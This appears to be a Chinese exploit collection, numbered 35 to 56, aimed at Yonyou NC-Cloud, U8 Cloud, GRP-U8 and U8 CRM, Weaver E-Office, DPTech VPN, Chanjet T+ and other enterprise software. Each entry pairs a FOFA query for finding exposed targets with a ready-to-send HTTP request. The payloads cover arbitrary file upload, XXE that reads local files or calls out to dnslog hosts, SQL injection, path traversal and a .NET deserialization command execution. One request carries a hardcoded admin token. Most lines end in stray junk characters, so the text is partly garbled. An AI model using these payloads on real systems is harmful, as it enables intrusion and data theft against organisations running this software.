1 o) h* L( z9 S+ G& _Connection: keep-alive u u% l$ [* @$ n4 n/ r' ^
7 T ^9 T* D T3 Y7 B/ o
) F0 j( c) s# |' Z: C% V35. 用友NC-Cloud importhttpscer任意文件上传. @# `; s) ?$ G) ?+ [7 o: I; A
FOFA:app="用友-NC-Cloud"' l" }" S K+ E3 Z9 O1 ?. q
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1# q6 }3 a" ^+ j9 d
Host: 203.25.218.166:8888
- d" m! y/ h1 S% K* ^User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
. Z; S2 I& Y- f4 |Accept-Encoding: gzip, deflate8 Y" Q5 V( H% X9 Q# j
Accept: */*& Q3 N! k- A0 A+ Y1 ^: d
Connection: close
! v$ g4 j/ E- R, z$ P4 waccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
% e Q' ` A7 L ]" U; e3 T! jContent-Length: 1903 q& J) a. |( @; a6 x7 ?/ x
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
. T7 u+ w2 x% f) F
% j! p- z/ l6 u7 _6 {6 M/ M--fd28cb44e829ed1c197ec3bc71748df0
/ v' \/ T8 E' |+ ]/ c3 a9 fContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"' ?' x- G; z% p
% ?3 G7 ] \0 i' D' y7 o. p<%out.println(1111*1111);%>* V, n. p- d* h9 D
--fd28cb44e829ed1c197ec3bc71748df0--5 e" p2 p0 @2 t0 ^, E) f7 p
. P) H# g8 l2 h+ j) S: q4 d1 ^8 F/ Z* u t5 i* m6 _
36. 用友NC-Cloud soapFormat XXE
k* \% E$ b& Q1 V( f% @FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
% m7 y: i' s6 r- v' |" d! FPOST /uapws/soapFormat.ajax HTTP/1.15 a1 _" H, A; P+ J, x7 c
Host: 192.168.40.130:8989
+ u8 P( Z/ O& d, _- |9 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
4 A X: d8 Q8 m; rContent-Length: 263* ? @) a4 V/ G# T+ w) R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: [' F- y+ F% N, O$ i; Y& A& T- a( |
Accept-Encoding: gzip, deflate1 s2 B" l7 A1 ?' G: I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; \- j' u' N$ l+ i
Connection: close
' U3 E* Y" d0 h7 e" PContent-Type: application/x-www-form-urlencoded" x, ^) B7 h! j
Upgrade-Insecure-Requests: 1; [! T3 q! m% O4 K5 g! W
* V% j4 z' m: g% b: Q% rmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
! f; w, j7 b; |7 Y, S* s: p, p0 Z) h( z# i7 H
" i* A- M: h H
37. 用友NC-Cloud IUpdateService XXE; D! e1 K0 X3 s
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"7 z3 f. K+ b% @3 k1 L* M
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
! a% }# g% e5 K/ L$ WHost: 192.168.40.130:8989% U& z3 z4 k; R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.361 f* Z- q# S- ~' l
Content-Length: 421/ o) {$ x" \! q5 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.90 i w: f* F3 r9 P3 ?5 u; c- h" ~; Q
Accept-Encoding: gzip, deflate7 j$ p' ^, Y% q( s) N
Accept-Language: zh-CN,zh;q=0.9
+ C+ V% j- m! f. @Connection: close
# f2 o; ^5 L+ U" hContent-Type: text/xml;charset=UTF-8
: X0 w( s R4 E3 B$ b. C0 ^0 `' ySOAPAction: urn:getResult+ o3 u. E( z3 ?# k3 p) b
Upgrade-Insecure-Requests: 1
3 C' H9 x* {) P ]( H6 U8 e) e+ j) m B. h0 L* t
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">. I- F7 v& l8 a
<soapenv:Header/>% o( Z: |- K3 k) g: d: X) I$ o
<soapenv:Body>
! G: q$ S u% C/ p# F6 l<iup:getResult>
' k3 ?: p$ M7 ~. A$ u7 W<!--type: string-->" G( ^7 V# L5 ?- _2 ~2 [# k; C
<iup:string><![CDATA[) @* H& g# E- u0 m- [2 T; l4 J- H, M* v
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
( I( d* t; w: n6 j7 N; q* I<xxx/>]]></iup:string>9 Z( Z5 [& t1 p5 K
</iup:getResult>
+ V9 N8 b( V) h0 _, l# {% e/ K L$ A</soapenv:Body>1 N" p+ L; ~1 _$ @# Y$ F' O
</soapenv:Envelope>3 k# S% j, T; e
$ n( d5 e9 S& O( K9 Y+ ]" _
4 A# @0 `4 M5 ?; f- ?* r' b# Q1 d% B3 O
/ M1 C/ t" [/ W, |+ t
38. 用友U8 Cloud smartweb2.RPC.d XXE% r2 {# o$ w @4 h* q1 ]' X
FOFA:app="用友-U8-Cloud"/ W0 |, ~* S/ Z$ z
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1% u7 z) c6 w% K# d" V7 [0 ?
Host: 192.168.40.131:8088, ^7 F: O/ [! h% J L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25+ |. f4 w* Y: A
Content-Length: 260
' D- f4 Z2 [% ?! V2 V1 |/ X; ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
5 p( }+ P" C% `! c* h5 g- t: S0 eAccept-Encoding: gzip, deflate
5 \% l, S a6 M: n) `2 DAccept-Language: zh-CN,zh;q=0.9
: a; ~ @: w0 M% Y+ UConnection: close
# r- n0 ^5 w) kContent-Type: application/x-www-form-urlencoded' C7 `2 K o% }* M8 P
8 _2 @; c( q* E8 M9 P+ H7 a
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>3 y2 [7 G3 Z* B2 u+ }6 I. u
/ S: R8 g% M1 W2 E7 I; k
! v6 E( y- g5 J; G0 V; H39. 用友U8 Cloud RegisterServlet SQL注入
* ^) B2 U. u7 ^: ~' }: u6 mFOFA:title="u8c": c& J% O. L; ? X U" x D
POST /servlet/RegisterServlet HTTP/1.1
6 W% M9 G5 e3 \Host: 192.168.86.128:8089
, G. u. r7 m* t. p- b" EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
" ]% b& C* V3 E, IConnection: close0 [ W2 b0 x* _. S' S x" ]
Content-Length: 85
# \6 k7 A) V: ^Accept: */*: q9 r1 r* [# ^$ G
Accept-Language: en
! p" W" K v |/ P1 a1 ~- ZContent-Type: application/x-www-form-urlencoded
- |9 D: f: \) F- q1 a4 y0 D" eX-Forwarded-For: 127.0.0.1
. m, c5 _7 ?5 B+ O4 ~' E# Z& tAccept-Encoding: gzip
$ q" c3 j7 y8 ?0 r; F3 d9 r
( C+ T7 Q, M1 z2 ^* Qusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
' ], ~* X. D1 T' |' @
: Y$ P8 p/ b2 g7 z; s7 c. [! l! n) ?& a% a. F
40. 用友U8-Cloud XChangeServlet XXE
/ S+ {; r6 s4 `! e/ G, IFOFA:app="用友-U8-Cloud"! f# x' Q0 M R# [. w
POST /service/XChangeServlet HTTP/1.1& [) E; S" ]+ E$ Y5 y1 `% t
Host: x.x.x.x
. x) m% i& o$ g* x+ o) RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" Q( t* ]* q/ c3 T( L n
Content-Type: text/xml! t1 C* w' y' y; N3 i- A
Connection: close
' |; e1 L# D( M1 ?- {
7 B j8 Y) c/ R; |+ c9 z<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
$ x0 C- W' {+ _* ]6 @. g
- D+ j6 u m! C/ p4 R. E. o; u! j& ?1 [
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
/ l( \2 ~! v8 |0 A' c) l+ n- [FOFA:app="用友-U8-Cloud"5 H6 u/ U3 d' f8 k" }! k( a1 e/ _
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
( ~2 V$ p- c$ }/ Q2 m6 q+ h, PHost:
2 q: S5 Q; p5 K, } h9 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 A3 i; Y. p1 F8 `0 F8 w8 UContent-Type: application/json( |! [2 A- w A( }8 K9 d
Accept-Encoding: gzip8 V8 k6 F# f: `8 Q6 m
Connection: close0 V. b8 z2 F+ u) |7 \5 D& f
: S& E7 v6 o; f' R5 H2 `
; V0 b2 y' s4 l8 d: E; Q# K8 @9 D
42. 用友GRP-U8 SmartUpload01 文件上传; @! }% e7 _+ e
FOFA:app="用友-GRP-U8"
/ E! G$ w8 V; E' y( N- X; @0 B* m! XPOST /u8qx/SmartUpload01.jsp HTTP/1.1+ H7 i s' r- M
Host: x.x.x.x% a2 Y- w( \" B9 S. g. c( Z& j" m" N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt& X0 W' Q. Y# t" O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.365 f# h1 `9 x- W0 P; T" @9 A' h. M
( c4 }: w, J, {6 T; E$ I t9 t+ rPAYLOAD
d8 I3 X/ @$ \# T& K% t
7 ?. K% o$ V6 b1 a3 }# z
: F. F* V0 X: _1 o* V2 Whttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
, e w% @- h) T
1 M) C9 S/ D; i; ?43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 U9 u4 q, A2 g' t& X" V2 G1 ~
FOFA:app="用友-GRP-U8"
% }5 g( ^: E4 ePOST /services/userInfoWeb HTTP/1.1
$ v* c7 z4 g" Z# Y5 qHost: your-ip: \. Q: d9 X) U& |. R5 i- ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# ?$ M/ u7 x' ?9 c8 i$ k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 [& _" z# F0 l. b9 ]
Accept-Encoding: gzip, deflate8 B, @9 K1 g" s
Accept-Language: zh-CN,zh;q=0.9
X, s8 ], \/ D- h# Q1 E! N* QConnection: close
+ [( S& h/ n2 L; z1 ^SOAPAction:1 y t8 W+ u% ?
Content-Type: text/xml;charset=UTF-82 l/ b4 o! [6 c2 c" X) _! q
8 o$ s6 O! u. k1 N<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
! m5 R8 y- V7 b- G <soapenv:Header/>
! L. q5 S* i1 x$ s. C! P- i9 j <soapenv:Body>7 t+ N/ q* F6 Z# j
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
0 ]7 d1 |( L9 G2 v. [ <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>7 N! V0 C+ i+ X4 I, F* k7 P9 X- I
</ser:getUserNameById>
- }: Y/ Z2 Z1 p </soapenv:Body>6 m1 o2 ^7 ^# l( t% Q+ m G% z3 y( a
</soapenv:Envelope>* z4 v1 S2 k. U) c
7 ~: P8 P T' o
1 l! @, V, q7 V5 |& V44. 用友GRP-U8 bx_dj_check.jsp SQL注入
* x9 h: R- ]% d$ c, _$ J6 ^FOFA:app="用友-GRP-U8"
8 ~" z0 r w" H( k8 ` [GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
' a/ R8 V9 ?9 @- SHost: your-ip
! N5 ^! M! `. t) U* J0 w; n7 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
/ c, s5 H5 u" ^" G' PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 h+ w1 S4 }1 r/ R5 |* c
Accept-Encoding: gzip, deflate
% G( d) ~9 Y7 q7 z, Y1 B, aAccept-Language: zh-CN,zh;q=0.9
9 T8 j8 v/ Q g) T$ P uConnection: close% d- |0 q6 Z: {. I4 e4 g
, K! l/ u6 x* c( g( A5 Y: Z6 ^
" s3 w; |; G$ \, Y n, I7 G/ C5 y4 ~45. 用友GRP-U8 ufgovbank XXE' i$ Z# D- S$ I' \8 U
FOFA:app="用友-GRP-U8"
" |2 l: K2 U0 f+ _+ V9 j8 gPOST /ufgovbank HTTP/1.1
7 b9 h9 u" P2 g1 l VHost: 192.168.40.130:2225 D0 I8 x, r7 t( I. {+ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0( S# Z- I( f. D+ w
Connection: close! N2 _( q. D2 w1 W, t' U
Content-Length: 161) |0 B% u% q. \6 F4 P1 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ I. f- ~$ `' _9 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; H3 G0 Q6 |9 _. p. gContent-Type: application/x-www-form-urlencoded8 o; |& i; B' S9 ^* d; I
Accept-Encoding: gzip
7 q+ i( ^- @) H; C( O# q* l, `
" J6 w* U) m+ }( A0 K! F6 S/ q+ @6 xreqData=<?xml version="1.0"?>: ]' A% m5 w4 H4 g8 D
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
- ^, Q% i. ~7 `( h' } P; T: h, M% \. D! d! T L
( o) U. S1 _9 n' v, L4 j% \2 [$ X
46. 用友GRP-U8 sqcxIndex.jsp SQL注入+ S, x6 B* p. g' h
FOFA:app="用友-GRP-U8"
1 }# _% p9 H) ]& W* z2 gGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
, c: r' X: V( b5 H" h4 o* EHost: your-ip. D" r7 P& L' k3 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.365 j5 m7 r8 D) u/ C5 l; B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 ^$ w. S. p, W% U$ n+ i7 S; O: ~2 N
Accept-Encoding: gzip, deflate7 B0 S+ I3 E. G
Accept-Language: zh-CN,zh;q=0.9
$ t3 j6 @1 b# ?/ t0 WConnection: close( ~( k0 D( x9 p2 t2 u
# m! ]' m# n$ m; W% m4 E2 v! L) E: `
47. 用友GRP A++Cloud 政府财务云 任意文件读取
. Q1 K( F5 g7 H8 s4 rFOFA:body="/pf/portal/login/css/fonts/style.css"
( i7 n! K: Y$ G! X$ s# {6 Y' `GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, a# V# R+ b% A, y8 w! w, sHost: x.x.x.x; V( f# \0 X, E8 F6 U) I; G+ F
Cache-Control: max-age=0
" ]$ j) C ]3 n5 ^( \1 ^Upgrade-Insecure-Requests: 1
, j0 Y5 P! B: V9 |# WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 I' b! b: U/ D7 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; e' X, n; {0 U) `) C2 @! aAccept-Encoding: gzip, deflate, br9 `8 Q- @! Z8 ] p. ^+ F. k8 E
Accept-Language: zh-CN,zh;q=0.9
" {) w5 ?% z4 Y: s7 A9 uIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
* }: W3 p5 i- _! iConnection: close; e+ a+ t7 E; ]! E2 J2 a& v
# C& d$ @2 I6 Z; [6 r& ]% p
6 E* h1 h. p: s6 E! P
- a. ?+ M6 g d) C5 d48. 用友U8 CRM swfupload 任意文件上传
3 _/ S5 [1 T. a- NFOFA:title="用友U8CRM" l0 Z q' N- A2 P+ {
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
9 N' E! ^) @5 F. Z( D" IHost: your-ip8 p5 g9 } H0 f- A) [6 D2 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; k8 B* P! P2 \9 M% rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 _' M* |4 B7 t4 T3 [, i* CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 s2 k0 r! c+ u( ~
Accept-Encoding: gzip, deflate
9 A& F( V6 k( D( NContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
* r0 ~( }) ~5 S& e. ]------269520967239406871642430066855* R8 l5 Q' q: _" ~
Content-Disposition: form-data; name="file"; filename="s.php") o5 l7 s. H/ A% z8 @" z( {
1231' L6 z+ `4 I& `1 w
Content-Type: application/octet-stream3 g5 T5 i3 @. j0 }( E0 f* V" y
------269520967239406871642430066855
9 a+ D* _9 ~ N/ M: UContent-Disposition: form-data; name="upload"' {8 @1 F: q: s3 x; ~3 @! P
upload
) Z8 `# b. c4 J: k, y------269520967239406871642430066855--
4 D# k2 ^3 {) d
. d( p0 n( M& z4 N* ^
! n9 a6 v* j3 j49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 Z: a# W' i7 m' QFOFA:body="用友U8CRM"
2 N6 K _0 F1 Q. f, p$ }( w
# e# [3 X w. t# H% GPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
# Y4 }2 ~ x2 c P wHost: x.x.x.x
* m4 p5 m- f& g) K6 _0 U; M( b3 M* AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% u" {: \0 V+ [% CContent-Length: 329
! ?0 r3 M* W& q. BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
q* b& Z0 x; O! A. ~Accept-Encoding: gzip, deflate
9 j: n$ A$ w/ x! ~# d, V7 H4 W6 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 f& q2 D+ j- r! p3 O0 P: v2 _
Connection: close
: W; t. r7 Y' t7 t( H/ b; |! `7 nContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
6 X% O, R1 E3 ~$ P
$ o* k1 N+ @ c; ~# i-----------------------------vvv3wdayqv3yppdxvn3w% p" B4 C5 v Y( z& K
Content-Disposition: form-data; name="file"; filename="%s.php "+ m u# Y K+ }# O A" q
Content-Type: application/octet-stream
+ |! c7 s1 n1 v3 v( m- i1 F% |3 z" B e* v% c! R
wersqqmlumloqa
4 A7 B0 S0 w _) p5 o-----------------------------vvv3wdayqv3yppdxvn3w" ]/ c8 g# |0 l4 b+ D. ?
Content-Disposition: form-data; name="upload"- W/ N4 A$ Q# b, O. z, a
% l s$ @4 y K7 vupload
8 ?, B% F2 O$ W" R-----------------------------vvv3wdayqv3yppdxvn3w--
( [$ q* k8 E. z) f) Q" E1 @; W5 B T- R* M7 e
% D0 C' I/ U. N7 M$ m Dhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
/ O# ]0 Z2 y' {# [7 Y
: J7 q, w3 o* C j( i4 D50. QDocs Smart School 6.4.1 filterRecords SQL注入; }6 A4 N, e( G3 `% W0 x
FOFA:body="close closebtnmodal"3 w& U& ~2 r5 K
POST /course/filterRecords/ HTTP/1.1
H5 B2 W! A! ]0 v, P) gHost: x.x.x.x9 F- [( D6 R; t, d) n) U$ y# j8 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 N, |+ Z0 p% Y" B) s5 P0 oConnection: close/ M" h9 z( A' p- ]) T
Content-Length: 2246 t. j6 d+ m& K. C& `- U
Accept: */*; H. W. i2 M- N
Accept-Language: en
( a" E! @$ ?9 d7 L# ~9 v' f( aContent-Type: application/x-www-form-urlencoded4 h# G3 \1 d6 k n# c, n/ E: Q* N
Accept-Encoding: gzip. R2 ?5 ^2 {! L
- c* E9 O4 H+ T6 I
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=14 v4 z3 ?" Q8 E
$ p8 O [. v$ \7 e
C a- g+ ?4 L% N51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入* c' |5 t9 [1 r6 e2 f; T7 \% ~
FOFA:app="云时空社会化商业ERP系统"
% V7 o$ l4 |7 l! H- M3 l0 oGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1$ B) d% h! T' C1 h3 ]5 ]
Host: your-ip
`8 U" z- L+ W* c- PUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36# A. X% D# X! L0 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
% @, y' l2 P0 ]+ m3 SAccept-Encoding: gzip, deflate
- Z0 \$ U% m2 ]: O+ P8 X9 k6 |Accept-Language: zh-CN,zh;q=0.9
9 R8 G- X' X( B" q! EConnection: close, T: G; i% H7 t
/ Y5 C/ u8 i0 J0 I6 @9 Q) D. O" y ]2 W* t1 }9 _/ Z
52. 泛微E-Office json_common.php sql注入
& P }7 v D7 R/ D- ?FOFA:app="泛微-EOffice"7 D5 F6 o! q7 _0 q% C% y$ h+ U+ w
POST /building/json_common.php HTTP/1.1
' O# K4 F4 X1 w2 ]( rHost: 192.168.86.128:8097
' f5 H. V+ h0 [ `: k( kUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" W( x- G4 b% u( `1 ]) I! Y/ hConnection: close
" a7 D9 x" W) |/ A. UContent-Length: 87
) m6 B- Z" @$ S- Y0 J8 x# H lAccept: */*1 ]! U" ?6 v+ i' h1 z
Accept-Language: en
" }0 |; h" m- A6 u) V; RContent-Type: application/x-www-form-urlencoded5 _: F! [/ I( ^- @
Accept-Encoding: gzip4 j2 S3 e5 @1 x; y1 t' v6 m
5 T9 o+ m) r |3 X- J$ P* ?tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3339 ^" i" x! a# v5 K
. r0 A" E; p. g) R, L
, h' d" V+ m# N8 G( M4 N" L53. 迪普 DPTech VPN Service 任意文件上传
! H8 r! D+ ]% N+ I P. kFOFA:app="DPtech-SSLVPN"4 X5 l$ V+ a# k- Q7 l) ^
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd0 L9 b8 O6 R; m9 ?) [
* Q& s- G+ i5 f' q3 W1 D
& A3 O, x p" n, O6 m; o1 R54. 畅捷通T+ getstorewarehousebystore 远程代码执行
# P. w ^3 f/ \& T. C) e: `FOFA:app="畅捷通-TPlus". H7 B+ d: X8 r' w* K
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
1 E/ P y1 }" `! t# R2 w"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"" V# s' v. J% l# s2 ^
$ C5 I, }; P+ {6 C0 \5 |/ `) @' H, Z: {% h2 [: H8 Y2 o: p" @
完整数据包
3 r* I% J( `% t- o! t CPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.18 n- M3 N. H" z; j
Host: x.x.x.x3 N* L6 _& B# `- D5 U/ v7 \
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
( M! K1 I, M0 Y3 TContent-Length: 593
7 Z- ]1 L! U- e. k( l* w& w6 \3 x0 |* {! R
{
; h+ y2 ]! T L9 ~+ @0 {; Q"storeID":{
6 A5 t: J1 G* z+ D! z# T "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",* ?. N8 b' q& _# k$ p
"MethodName":"Start",0 h" u( O5 j3 k! d* N% n$ x
"ObjectInstance":{
2 y+ R6 G+ u9 B* e' C4 o( _ "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
* Q( q) C& n! K3 x% O5 w. ^ "StartInfo":{0 m4 L/ ]; v6 q/ n ~( |6 F$ K
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",9 N+ H" b7 m& a; u
"FileName":"cmd",
% x v% E" R4 t- D. J+ C5 P1 O "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. ]7 f6 j9 s6 F* \0 X }
- m5 a6 {0 ^4 i" k0 J. r7 K }
& ^0 P) l- _$ L6 c }# p& _4 k% i$ A% Z! B3 J' m3 f+ J
}) C0 p$ q$ O2 T9 M4 L3 Y& O
2 W3 |' h* l' u4 _# [! }% x& ~" h0 g9 n& E
第二步,访问如下url
/ J7 ~/ x8 D( u( |) X! a5 W) a3 O9 s/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt9 Q7 v0 j( u4 q1 V; b
6 p" R) P; u/ B5 m3 o7 Z
( w9 a7 z U7 X5 S# w* r! M4 R8 i% |55. 畅捷通T+ getdecallusers信息泄露2 L! C% x9 Q. e& e6 g
FOFA:app="畅捷通-TPlus"5 F$ ?5 h: u$ }: q$ `( a& T
第一步,通过
1 @2 x7 ^* i; t4 V u9 @/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
" L! I: v& q' O/ }3 E第二步,利用获取到的Cookie请求( Z* J% ~! `4 U
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers& k0 z; P, h# d0 t
) Z6 |' r5 w. z9 c* G5 a' g( c- G8 f* A
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
8 l0 d+ t/ g3 M: d! cFOFA: app="畅捷通-TPlus"& a$ |/ Q, \4 ^' [& S% l6 [
